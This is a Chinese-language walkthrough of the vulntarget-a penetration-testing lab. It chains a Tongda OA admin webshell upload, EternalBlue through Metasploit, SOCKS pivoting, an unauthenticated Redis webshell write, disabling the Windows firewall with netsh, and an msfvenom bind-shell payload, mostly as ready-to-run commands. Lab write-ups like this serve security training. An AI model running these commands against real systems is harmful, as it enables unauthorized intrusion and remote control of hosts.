域渗透靶场-vulntarget-a综合靶场

nmap发现开放80端口

浏览器访问,是通达oa

可以搜索poc或者使用oa利用工具拿到shell

通过账号admin 密码滞空,进入后台

我们这里使用通达OA 11.2 后台getshell

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

点击系统管理 -> 附件管理 -> 添加存储目录

点击组织 -> 系统管理员 -> 上传附件

上传txt文件,抓包修改一句话木马,蚁剑或者哥斯拉连接

路径以及文件地址已给出,自行拼接,蚁剑getshell

信息收集,发现第二张网卡:

可以先让这台机器上线msf,建立路由,进行对20网段的渗透

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.135.152

set lhost 192.168.135.128

set lport 4444

run

添加一下路由

开启一下代理,可以进行内网渗透了

use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

run

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy

set version 4a

run

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99

config set dir 'C:/phpStudy/PHPTutorial/WWW/'

config set dbfilename shell.php

set 1 ""

save

哥斯拉连接

proxychains4 java -jar godzilla.jar

关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off #关闭防火墙

msfvenom生成shell

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

上传到哥斯拉,并执行